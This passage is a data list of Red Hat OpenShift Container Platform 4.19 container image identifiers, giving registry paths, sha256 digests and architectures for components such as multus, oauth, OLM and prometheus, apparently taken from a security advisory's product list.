"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
